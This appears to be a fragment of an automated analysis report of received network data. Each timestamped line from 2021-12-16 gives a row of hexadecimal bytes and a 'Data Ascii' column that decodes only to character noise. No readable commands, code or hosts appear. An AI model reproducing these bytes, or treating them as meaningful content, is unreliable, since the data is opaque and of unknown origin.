                                                        2021-12-16 12:20:36 UTC165INData Raw: 68 0b e1 8a a3 a2 ff 64 f7 ec 5d b2 c1 b5 7d a0 4d e7 5b 7f 35 19 40 64 e5 9c 51 41 b4 98 e9 73 a8 bb bf 03 d0 c0 27 cb 93 35 e5 f8 03 a4 cb 2e 34 36 e9 c5 b4 3a 9b 70 ea fc 3e 99 2a 7a b5 19 13 c0 c2 1e a6 39 57 f9 57 f2 e1 9c 0f 5d d9 bc a8 4d a9 04 db d3 42 bb b0 e1 ca d7 65 ef 6b 54 84 a9 da 0a ae 5e 3a da 95 94 56 c0 3e 2c 8c 99 da c7 62 e0 fc 16 d8 9c cb 53 bc b7 e2 e3 d6 44 92 55 15 70 92 9a 49 d0 91 6c 01 6a 67 8c 08 d7 b5 51 2f 36 27 a0 10 5d 99 73 6a 44 bb 67 cd c3 cc 89 f9 50 1d aa 40 de 0f 4a 99 92 85 8c b7 32 83 1c 6e 2b 2b d7 0f fc be 9b f5 90 96 a9 87 ad 53 2c 8f e8 69 5e 23 3a de 42 7d 9d ff 84 05 ab 89 53 af 98 04 79 f0 47 3c 13 96 91 c5 38 77 12 6e 81 66 ea d6 91 89 81 d1 68 45 a7 97 e8 d8 02 7a 14 a1 ec 62 b1 5b e8 4a af 34 22 c0 61 1f
                                                        Data Ascii: hd]}M[5@dQAs'5.46:p>*z9WW]MBekT^:V>,bSDUpIljgQ/6']sjDgP@J2n++S,i^#:B}SyG<8wnfhEzb[J4"a
                                                        2021-12-16 12:20:36 UTC166INData Raw: e1 ee 29 ea d6 6e 07 3a ad 27 75 02 f5 d2 35 fa 50 b3 b5 de 9b 8c d3 3e ca e8 ec 3b c8 43 63 c0 2d 74 f0 f1 d1 55 dd 4a 32 bb 75 6b 7b 2f fa d8 79 d4 9c f4 2f e9 0e bf 15 8e 77 2d 9a 83 e2 8c 2b 40 93 a1 9b 3b c0 fa ef 74 42 19 ac ff 0b af 2f e0 8b 58 1f a9 2a 6e 4b 0c 2c f9 40 48 0d f2 d7 2d 53 b0 56 d9 b0 85 75 02 ea 75 96 5d 02 b3 42 8f 35 be a8 36 4a 39 3a fb 08 ef 65 ca 37 43 86 15 09 9e 3f 2e db bd a4 28 15 7d ba b7 a6 66 10 c9 e7 1a fa c3 cf d3 be 47 27 6c 90 75 c9 3a e8 a0 5f 7f e4 b7 d9 5d 44 e6 7f a2 94 c3 34 6a fc 06 15 48 4a fd 9c d9 d6 91 0c 2b 2f dc 3a be eb d1 4c 7f ef 74 0e ac a6 00 41 a7 7c e5 14 d7 ad 33 78 36 c9 13 2f fd 5e 33 e5 06 91 f4 e3 a7 63 4a 29 54 0e b0 4c 11 1a 5b 07 59 0c 2f d9 24 83 3e 6d 4d ca 81 19 2b d3 e4 73 54 a2 fd bd
                                                        Data Ascii: )n:'u5P>;Cc-tUJ2uk{/y/w-+@;tB/X*nK,@H-SVuu]B56J9:e7C?.(}fG'lu:_]D4jHJ+/:LtA|3x6/^3cJ)TL[Y/$>mM+sT
                                                        2021-12-16 12:20:36 UTC167INData Raw: 71 70 98 a1 f4 0a f1 3b f9 ff e5 4a 40 7b b5 95 b7 db bb 41 0e a3 32 eb b7 5d 55 98 ce ad 84 a9 ae e6 57 81 6b ae df bd 63 65 90 4f b2 e7 78 a9 ef 37 d0 16 6d 19 ec e8 e9 85 ce aa 6f 2c 0f e8 96 d2 d9 a6 2c 7f af 23 a9 f5 89 3e 0b 8e 4c 39 59 87 52 5b 12 56 b9 9c b7 57 cd b1 fa d0 53 20 d3 dc 19 d4 0b ba 4d 94 a7 ad 96 20 d9 88 aa f6 91 c9 33 fd 25 e9 ca 9c 79 24 85 cc b5 56 b2 31 65 39 26 0f 31 91 e3 0f 3b 84 02 65 bf 8f 96 35 88 3b 05 e8 a6 a4 cb 9d e4 77 42 57 f3 cc f1 d3 8f 17 a4 a2 99 40 d9 0f 8e 34 b9 87 8a b2 1a 6a 2e d7 2c 29 20 0e ce aa 99 f5 07 92 2e 6a ab e8 ba 8c d0 6b 58 c4 d4 d8 7b 7a 99 09 2f b9 98 89 54 af 0f 45 ea ed 41 39 86 6d a3 7c 3f 75 e6 68 b3 be f3 d6 55 95 b3 d9 6f fe 8c 92 db da 04 ed 82 a0 69 78 b5 4d 7e 97 97 34 24 c0 95 ed 7d
                                                        Data Ascii: qp;J@{A2]UWkceOx7mo,,#>L9YR[VWS M 3%y$V1e9&1;e5;wBW@4j.,) .jkX{z/TEA9m|?uhUoixM~4$}
                                                        2021-12-16 12:20:36 UTC168INData Raw: 6e 17 f7 61 e4 07 e2 b6 26 65 00 f4 d2 d8 74 43 a0 94 49 86 47 cb 30 cb e8 95 3d 54 de 62 d1 a7 ff 6e 0a d8 59 3e 56 ae a6 74 eb c0 14 ca 4d 79 38 76 d2 3f eb 0f bf d2 21 67 39 bb 14 75 5d 33 4e 92 a1 e4 36 d0 78 ee 62 b8 83 bd fc 03 a1 fe e9 9b 5a 1e 29 67 55 66 99 2c f2 20 50 00 f0 d6 2d 6d 04 45 cd 91 12 c4 05 ee 67 97 5d 35 ad 4f 0d 34 a8 0b ae 58 2c 32 eb bf 06 70 c8 36 43 af 18 19 68 38 80 98 a2 b9 86 4c 7b c0 b1 b5 75 46 88 65 fd bf cc 99 0f 2a 41 60 72 c6 e4 0d 21 ac 58 0b ee ce bc ff 43 42 e0 05 b5 87 05 74 6c 6b 16 5e fe 7e 7d 68 df 9d 9e 0a 63 56 aa 20 ad bd 61 b8 7e a0 6a 58 3d 52 07 19 c9 23 74 d0 32 81 2d 2e b6 e3 05 60 74 09 3e 1a 16 de 7a 8e a1 19 4c 3a 47 58 a7 da 49 4d 54 51 f5 94 29 8d 3a d5 a8 a9 db 9f 6b 46 ba f9 6f 56 4a f4 7d 4b 22
                                                        Data Ascii: na&etCIG0=TbnY>VtMy8v?!g9u]3N6xbZ)gUf, P-mEg]5O4X,2p6Ch8L{uFe*A`r!XCBtlk^~}hcV a~jX=R#t2-.`t>zL:GXIMTQ):kFoVJ}K"
                                                        2021-12-16 12:20:36 UTC170INData Raw: 60 83 34 a3 ec 69 1f ec 34 24 ca b4 5d a0 af e9 af 79 26 14 aa 64 6b 05 5a 40 b4 98 2c 72 3f ba 49 0e 24 c0 69 53 91 35 e5 f8 4b a7 5c 2f 3a 36 1b c5 7e a1 99 70 ea fc ed 9a 2d 6e 2b 1a e1 c0 52 1f a4 39 50 f9 a5 ec cc b9 e3 5f 2b bc 3b 4c ab 04 d8 d3 05 af f4 ea 62 d8 97 ef fc 55 26 a9 d9 0a 90 5e 00 d1 8d 9b a4 c0 a0 2d 8e 99 d9 c7 0f f4 b5 1d 07 93 39 53 23 b6 e0 e3 d5 44 36 4e 38 55 7e 98 b3 d0 23 6d 04 6a 64 8c e5 c3 f1 5a 87 39 e1 a0 a4 5c 9c 73 69 44 11 67 f7 c8 c9 86 32 50 a4 ab 42 df 0c 4a 73 88 cc 87 70 3f 48 1c d5 2a 29 d6 0c fc ae 87 d8 b5 62 a9 50 ad e8 2d 8d e9 6a 5e 82 23 9a 49 b1 90 2c 84 be aa 8b 52 ac 98 02 7e ca 4c ef 1e 49 91 7e 39 75 12 6d 81 fa f6 9f 9a 17 8e fe 69 91 3c 95 e9 d8 02 fc 0d 92 c9 e1 b3 68 e9 22 8c 36 22 c0 61 ed 5c cf
                                                        Data Ascii: `4i4$]y&dkZ@,r?I$iS5K\/:6~p-n+R9P_+;LbU&^-9S#D6N8U~#mjdZ9\siDg2PBJsp?H*)bP-j^#I,R~LI~9umi<h"6"a\
                                                        2021-12-16 12:20:36 UTC171INData Raw: ce ef 56 78 2c 3a 02 2f 64 00 f4 d2 cb f4 b7 b7 02 da ad a6 cf 3a ca e8 95 3d 47 5e a6 c1 31 6c 45 ec 7c 53 3f 56 ae a6 67 6b 6f 00 1d cb 52 d4 de d4 3e eb 0f bf c1 a1 7d 1e 6c 92 5e af af 50 93 a1 e4 36 c3 f8 79 75 59 1c 96 fd ee bb ff e9 9b 5a 0d a9 f0 42 da 0a 07 f9 05 55 01 f0 d6 2d 7e 84 6f dc f6 9f ef 17 83 62 96 5d 35 ad 5c 8d de bb dc 28 73 3b 7f ec be ce 2e c8 25 43 33 0b c2 9e 14 2e c0 ab b8 36 13 7b d3 b1 9f 63 d8 53 5a 1b 75 c4 98 53 4a 41 73 72 d3 e1 d6 39 85 be 41 e5 cf b0 9e 43 51 e0 c3 a6 53 db 48 ea e3 1d 5f 56 1c 7d 7b df 1d be fd 3c 7f da b9 a0 bc 51 db 7e b3 6a 05 38 89 04 24 b9 7a 78 d1 d6 e2 2d 3d b6 74 15 17 eb 22 b3 1f 19 df ea e5 a1 0a 4c 2e 50 af 21 f1 10 02 66 50 d9 f8 29 9e 3a ff b9 1f 48 b4 9f c7 8e f8 e3 27 4a e7 7d bb 36 0f
                                                        Data Ascii: Vx,:/d:=G^1lE|S?VgkoR>}l^P6yuYZBU-~ob]5\(s;.%C3.6{cSZuSJAsr9ACQSH_V}{<Q~j8$zx-=t"L.P!fP):H'J}6
                                                        2021-12-16 12:20:36 UTC172INData Raw: c2 a2 ee 8a da 79 ed d3 b3 ca b2 75 77 b4 21 5b 33 40 d3 cc 65 6b 9d 5a 46 bc 59 24 3b a9 f6 ca fd 42 c1 a9 ca 91 33 ed 36 44 67 cb 63 29 3e 7a c4 3a 3b 99 76 e2 c4 84 bd 2e 34 38 26 80 c1 52 1f a4 3f 5b b3 8e 0a e0 d2 12 15 4a bd 3b 4c ab 02 d3 89 4b 89 b4 ae d7 ab f6 ee fc 55 26 af d2 6c de a3 3b 95 95 1c c5 c1 a0 2d 8e 9f d2 e9 7d d9 fd 46 c5 20 58 52 23 b6 e0 e5 de 7f 04 ce 16 20 8f 52 d2 d1 23 6d 04 6c 6f 13 b6 e5 b1 00 32 ca 80 a1 a4 5c 9c 75 62 e9 42 9a cc 92 d1 81 52 51 a4 ab 42 d9 07 50 2b ae 81 de b2 0c 28 1d d5 2a 29 d0 07 c8 b6 61 f4 c2 93 e3 30 ac e8 2d 8d ef 61 2f cb 0e df 11 78 e3 4c 85 be aa 8b 54 a7 18 4b e5 f3 14 39 99 29 90 7e 39 75 14 66 28 9d 44 d2 c5 94 3d 9e 68 fe a6 95 ef d0 b6 cc a9 a5 b8 67 7b 08 e8 96 ae 36 24 c8 7b f7 0d e3 46
                                                        Data Ascii: yuw![3@ekZFY$;B36Dgc)>z:;v.48&R?[J;LKU&l;-}F XR# R#mlo2\ubBRQBP+(*)a0-a/xLTK9)~9uf(D=hg{6${F
                                                        2021-12-16 12:20:36 UTC173INData Raw: 97 41 ab 80 3b be 2a 65 06 ec ff fd de 60 c0 b4 f2 00 a7 c3 3c cb ee 8d 10 71 6e 41 b1 87 e8 e8 ed d0 55 3e 57 b6 8b 51 3c e3 74 ea 82 f0 d5 7e de 3f ea 0f 28 d3 b2 67 5e 9b c7 fe ae 3b 42 92 a0 e4 c2 d6 eb ee 05 98 4c 37 fc 0a af fe f8 9b cd 1f d4 44 32 46 a2 a6 f8 29 40 00 e6 d6 ba 6c 12 66 aa b1 31 e7 17 e7 77 97 5b 2d 80 6a 9e 34 cf 2b ad d5 3a 3b fb bf a8 2d 5f 37 c4 8e 78 19 70 b2 2f 90 b3 b9 30 0b 56 e5 a2 b5 15 46 6e fd 1a bd dd 99 35 49 0f 70 61 c6 84 0d 0d 22 bf 09 ff ce f4 9d d4 43 1e 04 d5 87 85 ef eb 6b 07 5e 47 04 4e 4d 59 9d fe 0a 95 d8 db 29 bc bd 47 db e9 a1 41 7c 5d 52 0a 80 b8 2a 65 d0 c0 e2 ba 2f 87 c7 65 60 5b 86 b2 13 07 de fc e5 36 18 0f 1e 24 58 40 54 11 4e 45 51 cf f8 be 8c 64 f1 ca a9 6c 0e 9e 4f ab f9 f5 27 dd f5 0c 6f 40 18 bf
                                                        Data Ascii: A;*e`<qnAU>WQ<t~?(g^;BL7D2F)@lf1w[-j4+:;-_7xp/0VFn5Ipa"Ck^GNMY)GA|]R*e/e`[6$X@TNEQdlO'o@
                                                        2021-12-16 12:20:36 UTC175INData Raw: af 7c 8b 66 3a ec c5 b3 5d b5 6a ab c4 e1 9b a1 41 1b 8f 64 7d 9d cd 41 02 9c 50 72 24 64 cb 01 01 c0 bf ca 06 34 80 f3 30 a7 23 f1 28 36 3e c5 2c 3b 6d 76 11 f7 d4 98 06 9a 39 1a c4 c0 44 1f 50 3f 36 f2 de f4 95 7c 13 5d 0e bc 2a 4c 3c 05 70 f9 3e ac e8 00 d6 d7 b2 ef ed 55 b1 a8 11 20 ab 5d 3a 38 94 94 81 c0 b6 2d 7a 9f cd cc 34 f7 70 fd c4 9c 1c 53 35 b6 24 e2 44 54 4d 56 59 9c 8e 9a 96 d0 35 6d 93 6b 19 a7 de c0 65 a1 33 36 c4 a0 b2 5c 68 75 14 6f 2a 64 79 e1 d1 89 17 50 a2 b3 6f fa 1c 4a 48 8b c9 7f b3 30 6d 1c c3 2a be d7 d7 d7 d5 9f 25 64 92 ab 75 ad fe 2d 1a e8 99 75 b9 20 ee b4 79 9f 09 84 a8 aa 7f 54 a5 b4 39 7d 74 b0 38 11 6c 91 78 21 58 37 44 a2 c1 f5 4a 66 95 81 db 69 f8 be b8 cc 89 2e 90 15 35 14 66 b3 4d e9 f0 ad 78 32 d3 61 96 44 02 ea 32
                                                        Data Ascii: |f:]jAd}APr$d40#(6>,;mv9DP?6|]*L<p>U ]:8-z4pS5$DTMVY5mke36\huo*dyPoJH0m*%du-u yT9}t8lx!X7DJfi.5fMx2aD2
                                                        2021-12-16 12:20:36 UTC176INData Raw: 43 73 06 3a 28 2a d6 02 12 d0 a5 f4 f4 b3 b6 de 87 a6 55 3c 81 fc 73 3f 29 5e b0 c2 85 68 6f ec 46 55 e3 54 48 a4 09 6b 2e 07 e8 da 78 d4 e8 de 4b ff e9 bd af a1 6d 2c 99 83 74 af ad 42 95 a2 02 34 ad f8 c8 77 9a 14 bc fd 9c af 26 fc 7d 58 63 a9 25 40 44 0e 2d f9 bf 40 3b f3 30 2f 10 84 18 d8 b3 85 c5 17 71 77 4c 4b d3 af 32 8d 4c bd 29 39 59 3b ad fb da cd c8 ca 4b 43 3b 0a 1b 9c 3e 2e 06 b3 a1 21 f5 79 bd b1 1a 67 44 49 70 1b 2b dd 16 50 ac 43 1d 72 0d f6 0f 3b af be 9f ff 8c a7 78 41 3f e0 e2 a7 85 c1 62 ea fd 07 87 55 fa 7f 15 df 9f 8b 08 2d 55 da bf bc 34 49 3d 7c dd 6a 46 28 50 06 0e b9 bc 65 d3 d2 04 2f 53 b6 d9 10 62 e3 08 b3 85 07 8b f0 03 a3 64 4c 6c 52 5a 30 db 10 d8 45 7c dd 1e 2b f0 3a a4 ba ab 4c 9e 9f d9 ab ed f8 c1 48 89 7d c6 30 1a c7 f6
                                                        Data Ascii: Cs:(*U<s?)^hoFUTHk.xKm,tB4w&}Xc%@D-@;0/qwLK2L)9Y;KC;>.!ygDIp+PCr;xA?bU-U4I=|jF(Pe/SbdLlRZ0E|+:LH}0
                                                        2021-12-16 12:20:36 UTC177INData Raw: a2 8a f0 3a 38 e7 55 c8 c9 7d c7 b4 e3 5b 7f 40 8d 8f 3a 6a 7b 58 3d b4 11 20 70 a8 bb ca 97 01 5a af 2c 93 48 e5 52 40 a5 cb 2e 29 a0 3e 74 3b dd 9b 0d ea 30 a4 9a 2a 7a 38 8c c4 ce 55 f9 a6 44 53 17 ae f6 e1 9c 12 cb 0e 5f 3a aa a9 79 db c3 4d ae b0 e1 d7 41 b2 ab fb b3 24 d4 da 3b d8 5f 3a da 95 02 81 95 a2 cb 8c e4 da 95 47 f5 fc 16 c5 0a 1c 55 2b 50 e2 9e d6 30 3e 54 15 70 8f 0c 96 5c 21 8b 06 17 67 1a ad c2 b5 51 32 a0 c4 53 ad ba 9e 0e 6a fc 59 66 cd c3 d1 1f 17 e6 a6 4d 40 a2 0f 90 3b 89 85 8c b2 a6 6d 51 c1 cc 2b ab 0f 00 a6 9d f5 90 93 3d 75 4d ea cb 8f 94 69 43 cb 22 de 42 78 09 09 f3 aa 4c 89 2f af a6 4b 7f f0 47 39 87 6c 9b 7d df 77 6f 6e de b3 f7 d6 91 94 17 db b2 eb 40 97 94 d8 82 e2 17 a1 ec 67 25 4d d7 95 48 34 5f c0 c3 e4 46 e2 13 33 ac
                                                        Data Ascii: :8U}[@:j{X= pZ,HR@.)>t;0*z8UDS_:yMA$;_:GU+P0>Tp\!gQ2SjYfM@;mQ+=uMiC"BxL/KG9l}won@g%MH4_F3
                                                        2021-12-16 12:20:36 UTC178INData Raw: 3f 2e 86 27 51 03 17 44 ee d9 91 ae d7 9d ff eb 5b bd f8 6e 46 e9 0d 7f 49 6c e1 3a 21 b6 01 2a bd 8f ec 23 2f c9 7d b6 88 e6 7a 5b 38 8d bd 10 2e dc a9 a9 cc 6b 1b 4e 32 23 b0 fe 46 d6 b0 ef f0 cf 07 2e 57 36 fa b8 13 85 20 4f e6 e3 97 9a 63 b0 1d e9 ae 0b 1f f9 e6 bd c7 3d 2f f3 c8 4a 52 a6 f9 19 f3 7e ec 14 af 3f e7 5e 30 41 3f 8a cb 82 24 18 d9 35 9e 3e e3 6f b2 df 64 09 c7 6e 04 1e 74 8b a3 a2 1c 66 e4 e5 35 b1 b7 b4 f3 b5 bb e1 5b 7f d6 1b 2e 66 8d 9f 27 40 04 8d 2f 72 a8 bb 5c 01 1b d4 4f c8 ec 35 37 ed 4f a7 cb 2e bf 36 f5 c7 dc 39 e4 70 1e e9 ab 98 2a 7a ae 1a a6 d4 b4 1d d9 39 45 ef a1 f4 e1 9c 84 5d fb be dd 4e d6 04 e3 c5 41 ac b0 e1 41 d7 74 fa 1a 57 5b a9 80 1c d4 5d 3a da 03 94 9e c3 46 2f f3 99 a6 d1 4b f7 fc 16 53 9c d5 45 c5 b4 9d e3 4b
                                                        Data Ascii: ?.'QD[nFIl:!*#/}z[8.kN2#F.W6 Oc=/JR~?^0A?$5>odntf5[.f'@/r\O57O.69p*z9E]NAAtW[]:F/KSEK
                                                        2021-12-16 12:20:36 UTC179INData Raw: 52 99 35 92 01 c1 ae b3 d0 6f 42 b3 51 65 41 0e b2 9a 31 54 2b 89 6e a2 f2 89 a4 47 be 0a 7b f2 f0 d3 07 cd 02 56 7e 56 13 1f 74 69 95 c8 8f 41 10 c5 f8 16 aa 5d 7e bc 82 f6 48 be 65 72 ea 82 78 66 4c 8a ed 4b 7e f0 6d ab 38 31 da 85 37 56 54 e4 63 89 99 8a 33 88 a9 a8 95 3d 84 3b 87 d0 37 09 ff f1 1c 9b ec 9a d4 10 61 4d c2 47 7f ba 15 48 e4 b9 36 37 ee 11 9d 5e f3 67 4d 96 23 4c e2 ee 17 e6 d7 73 5d 3c 58 28 18 00 4b f3 da f4 43 b1 22 de 68 92 25 3e b6 e8 74 1c 56 5e 62 c0 11 68 23 ed 36 57 43 56 ad 84 76 6b c0 05 7c da f0 d2 98 dc 42 eb 2a 9d d0 a1 67 2f 0d 83 eb ae dd 40 ef a1 a3 14 d2 f8 ee 74 0e 14 40 fb ec ad 83 e9 f2 78 1c a9 67 43 d0 0e fc f8 cf 42 7d f0 5d 0f 6f 84 45 db 27 85 f7 10 01 75 ea 5d 99 8f 4d 8d 34 be bd 39 a7 3a dd f9 c2 ce e3 ea 34
                                                        Data Ascii: R5oBQeA1T+nG{V~VtiA]~HerxfLK~m817VTc3=;7aMGH67^gM#Ls]<X(KC"h%>tV^bh#6WCVvk|B*g/@t@xgCB}]oE'u]M49:4
                                                        2021-12-16 12:20:36 UTC181INData Raw: 2c bc 33 53 95 17 d0 7c 3f da d2 31 4f ae e9 07 a9 fa f8 46 c1 ba 99 ce 17 07 ca 70 b4 7f 3e bf 19 ec 9d bd 2f e3 ca 6e f0 2a 59 98 99 bf 86 2e 87 1e 4f 37 10 fd 7a 62 21 72 ea 44 40 b0 07 62 29 cb 52 b1 6c aa ba f7 91 22 d9 e6 26 20 7c 4e ca fb 91 fe 09 19 ec e4 2b c7 24 bc 15 31 36 b4 38 a9 1b db 6b ee 82 af f9 54 b8 82 3b d9 36 9b 80 6e 0d db a3 9e 7d 70 89 c7 a0 82 d4 97 6c 68 0b 76 1d a3 af a7 80 38 91 d3 b3 e4 b6 7d a0 b9 77 5b 12 45 fd 8d 19 6b bc 74 42 b4 98 2d e4 a8 5d fa e7 03 bd a9 88 bf 37 e5 f8 4d 31 cb 8b 2c d0 3c b8 3a 5f b7 72 ea fc a9 0e 2a 6a 09 fc c6 bd 52 99 8a 3b 53 f9 a3 62 e1 53 17 bb 0c c1 3b e4 85 06 db d3 43 3a b0 db e6 31 b0 92 fc 9c 08 ab da 0a d6 cb 3a d0 93 72 83 bd a0 c6 a0 9b da c7 49 61 fc 19 f7 7a 1e 2e 23 bb cf e1 d6 44
                                                        Data Ascii: ,3S|?1OFp>/n*Y.O7zb!rD@b)Rl"& |N+$168kT;6n}plhv8}w[EktB-]7M1,<:_r*jR;SbS;C:1:rIaz.#D
                                                        2021-12-16 12:20:36 UTC182INData Raw: b9 37 04 01 e5 2f 55 31 22 a4 4a 14 67 d1 2e b0 0c 31 cf be 6f ce da 14 96 e0 45 0c 2a 79 64 f0 41 86 2b 0d 1a 98 6b 57 1d a0 49 97 5e 8f a4 85 23 36 6e 4c 3f 3a be 74 d6 4a 28 65 7a 65 64 4d 2a aa 0a a9 49 69 d1 6f 3d 38 3e 48 63 32 2d b2 42 27 8b a0 ab 31 1e a9 34 19 db 8a 74 61 14 73 0b a4 d0 1e 0d ec a3 46 f6 52 36 24 ad 3b b8 68 69 e6 2f 36 69 63 f7 10 11 15 6c 0a 94 bd 6d e0 78 17 8b 45 95 04 47 be 00 5f 02 f4 d2 d8 62 43 bf 94 38 85 db c3 77 f1 ea 95 3d 54 c8 62 57 83 8e 6d 91 d0 39 04 54 ae a6 74 fd c0 2b cb 3c 7a a9 7e 50 05 e9 0f bf d2 37 67 ee 9f 65 76 d2 3b ed a8 a3 e4 36 d0 6e ee 2a b9 f2 be 80 0a 7f c4 eb 9b 5a 1e 3f 67 a8 42 e8 2f 84 29 b1 3a f2 d6 2d 6d 12 45 a0 95 63 c7 6a e7 65 ac 5f 35 ad 4f 1b 34 a2 2e df 5b 46 3b c8 84 cc 2e c8 36 d5
                                                        Data Ascii: 7/U1"Jg.1oE*ydA+kWI^#6nL?:tJ(ezedM*Iio=8>Hc2-B'14tasFR6$;hi/6iclmxEG_bC8w=TbWm9Tt+<z~P7gev;6n*Z?gB/):-mEcje_5O4.[F;.6
                                                        2021-12-16 12:20:36 UTC183INData Raw: 2a 33 cb 01 f1 46 05 d9 f5 ea 33 9f 82 eb 91 a9 06 64 a0 eb e6 7f 83 2f 05 38 5c b6 e9 3e 7d 8d 0a 21 c4 c9 91 f2 6c e4 07 5b 0e 99 e6 04 c8 de 42 a9 a7 28 ff 4c 4f 23 e4 ea a8 d4 56 ed 1b cf 7d 6a b3 34 87 b8 61 91 ab 5b 00 e1 7c 9a 9a f2 f9 eb d3 0b 8f ec f2 be 21 3f c4 f3 c4 0e b6 a4 84 19 4d 6b 04 01 49 3d 0c 5e 98 00 db 88 b6 82 f8 0d 91 36 78 3c 08 6f fc 9b 80 0b ba 6e fe 0b 9c 9d 45 a0 f7 66 60 aa d1 b3 ca b4 eb a0 cd e2 bd 7d 3d 1b f3 22 69 9d 5a 40 22 98 0a 65 4e b9 b7 01 9f 86 ab ca 91 35 73 f8 d3 a4 2d 2c 54 36 fe 83 38 3b 99 70 7c fc 3c 8f cc 78 45 1a 26 86 50 1f a4 39 c5 f9 4b f7 07 9e 6f 5d 0a fb 39 4c ab 04 4d d3 48 b5 56 e3 aa d7 94 a8 fe 55 26 a9 4c 0a c4 59 dc d8 e8 94 c6 87 a2 2d 8e 99 4c c7 d6 ed 1a 14 b8 9c 75 14 21 b6 e0 e3 40 44 0c
                                                        Data Ascii: *3F3d/8\>}!l[B(LO#V}j4a[|!?MkI=^6x<onEf`}="iZ@"eN5s-,T68;p|<xE&P9Ko]9LMHVU&LY-Lu!@D
                                                        2021-12-16 12:20:36 UTC184INData Raw: 70 a0 e7 c3 45 b3 6f 0e a6 b1 2c 65 47 2e ff 9c d7 56 c0 89 b2 f6 16 8b d9 47 9a 2a 9a c6 16 d1 ec cd af 36 9a 54 6e 1f 36 49 ea c9 69 43 fb c5 f5 42 4e 5f 03 bc e2 d6 e3 b8 83 70 01 82 ac 06 a8 88 90 4b ff d1 af aa de 33 31 85 35 02 b0 e6 1e 89 36 ab 2c 8f 4f aa 7e 3d ae 5b 63 d2 4a 09 32 d0 ec 9a 0a 98 3f 10 18 19 26 45 02 ba fe 69 b5 be d0 35 05 11 7b 3e 17 65 30 96 2b 6d 84 ec f1 e4 3c 73 8d 68 bc 2a 65 00 62 d2 26 fc a5 b3 c9 de 2b f4 c1 3c cb e8 03 3d cf 5c 84 c2 fa 68 a2 be d2 55 3e 56 38 a6 53 60 26 07 97 da 96 86 7c de 3f eb 99 bf 17 a3 81 2d e6 83 7b fc 39 42 92 a1 72 36 8c ec 08 76 e5 14 8d ae 08 af fe e9 0d 5a f1 ab 81 41 3b 0e 7f aa 2b 40 00 f0 40 2d e1 90 a3 d9 cc 85 b6 44 e5 77 97 5d a3 ad 56 8e d2 bc 56 39 cc 68 39 fb bf ce b8 c8 db 56 49
                                                        Data Ascii: pEo,eG.VG*6Tn6IiCBN_pK3156,O~=[cJ2?&Ei5{>e0+m<sh*eb&+<=\hU>V8S`&|?-{9Br6vZA;+@@-Dw]VV9h9VI
                                                        2021-12-16 12:20:36 UTC186INData Raw: d5 51 7e 17 d5 25 db d8 af 31 09 82 3f 2c 4f f8 13 46 5a c6 7d cc 6a 07 ae 5c d7 7a d8 bd f2 ec f6 e4 cb e1 b7 6e 72 07 81 a8 7f bd 6d 2e 2a 62 ab 35 6d fd da 4f a8 77 0c 46 ab b0 f7 38 cd c9 2f b1 a2 87 bc c6 77 20 32 e6 d9 5f 98 4c b7 fb 7d d3 c8 1c 0a e6 c0 c7 61 e7 f1 33 4b b4 32 84 37 ea 8d ec 69 af 41 2f 5c 80 46 d9 1e b6 7c 6b eb d9 48 9e a1 2b 6d c5 dd 82 9d ba 6c 5a ed 74 f6 a3 62 d4 64 3a ec d3 25 ca 9c 7b 46 bb 9c 5b 9d 1e 19 8f 64 6b 0b 5a 0a 86 7e 2f 0f a8 bf 95 03 01 c0 a9 5c 91 67 e3 1e 4f da cb 08 76 34 3e c5 3a ad 99 96 de 1a ab e5 2a 32 67 18 c4 c0 52 89 a4 b9 52 1f a1 89 e1 f6 4d 5f 0e bc 3b da ab a8 dd 35 41 d1 b0 6d 88 d5 b2 ef fc c3 26 6a db ec d4 20 3a 77 ca 96 81 c0 a0 bb 8e b9 dd 21 4b 8a fc d8 9a 9e 1c 53 23 20 e0 16 d7 a2 32 2b
                                                        Data Ascii: Q~%1?,OFZ}j\znrm.*b5mOwF8/w 2_L}a3K27iA/\F|kH+mlZtbd:%{F[dkZ~/\gOv4>:*2gRRM_;5Am&j :w!KS# 2+
                                                        2021-12-16 12:20:36 UTC187INData Raw: a9 0c 27 3a 1a 33 88 8f 5b 2e a4 d1 03 95 89 31 5d bc a4 e9 56 16 4a d9 c0 04 dd 7b 33 f0 9d 99 33 0e a6 98 2b 76 e1 a2 88 97 e5 a0 52 86 d4 35 45 59 5c 00 a5 75 74 61 b4 66 6b 7d 60 7c 58 a9 a1 91 e9 42 db 6c 9a 39 1a 5a 5e 32 99 b2 90 39 9f a3 62 31 df a5 b4 00 04 89 9b 6d 9b 4b c0 a4 bc 07 88 ec db 43 a7 74 69 27 04 03 1f 4c ef e6 90 37 91 68 39 11 45 14 f3 03 bb be 44 e1 4d 30 d2 42 22 07 a6 9d 16 66 d9 f4 79 ea b4 40 68 b4 e0 94 e1 c0 e5 cb a0 85 2e 54 3f 63 3e 9d 62 6c 8d d1 53 1d 1b ad cf 75 f2 df 83 ea ab 79 f9 5b cd 3f 8a 0e db c7 f8 64 ae 9a 6b 7b f1 38 c3 93 56 cf 52 d3 71 ef a7 bc 5d bd 6c 0b 22 f5 83 98 e3 1f ce 77 c7 45 cf 2c 83 01 cb 03 69 d7 47 45 15 46 42 b0 ee d6 e9 e6 ee 96 af 1a 35 4c 14 35 53 07 c7 58 a2 3a 8e 96 56 2d 51 37 30 a6 c9
                                                        Data Ascii: ':3[.1]VJ{33+vR5EY\utafk}`|XBl9Z^29b1mKCti'L7h9EDM0B"fy@h.T?c>blSuy[?dk{8VRq]l"wE,iGEFB5L5SX:V-Q70
                                                        2021-12-16 12:20:36 UTC188INData Raw: 9d 0b ce 47 f0 e9 91 ae 98 9f 2a fd de ac 33 6e a4 ee a2 76 1d 68 2b 2c 63 bf b6 3e 29 84 a9 2a 80 ca cc 92 f6 e7 ee 58 54 b4 f6 19 17 df c0 9a 1b 6c 0c 4f 17 03 25 e3 b5 d5 ec e2 2f ce 60 2f c7 10 ce b9 5e 91 55 5a 64 ea 28 9a d6 be 7c e2 2a 08 a7 f3 c1 b9 3e 3e 24 ec 16 4f bd a0 e0 0c 92 6a 17 17 f9 28 54 5a 79 45 74 97 93 86 c7 0d 59 16 d7 3f 9c 6c 09 f0 26 02 0b 6e ec 0b bd 82 b2 a6 1c 55 e8 e5 62 b3 5d b4 a2 a9 50 e3 d4 75 e8 1e 66 66 06 88 bc 49 05 98 49 67 1e bf 9e 01 0d c8 2b cd 78 37 88 ed a3 ae 62 2e 82 1e e7 c0 6b 39 b4 55 56 f8 00 98 2b 56 0a 10 48 c0 a6 2d e4 33 df f9 c2 ee a7 96 bb 5d 6a a9 72 4d 3a 05 4c d3 0e a6 a1 e5 41 e4 e0 e5 dd 51 0b 8c 66 0e 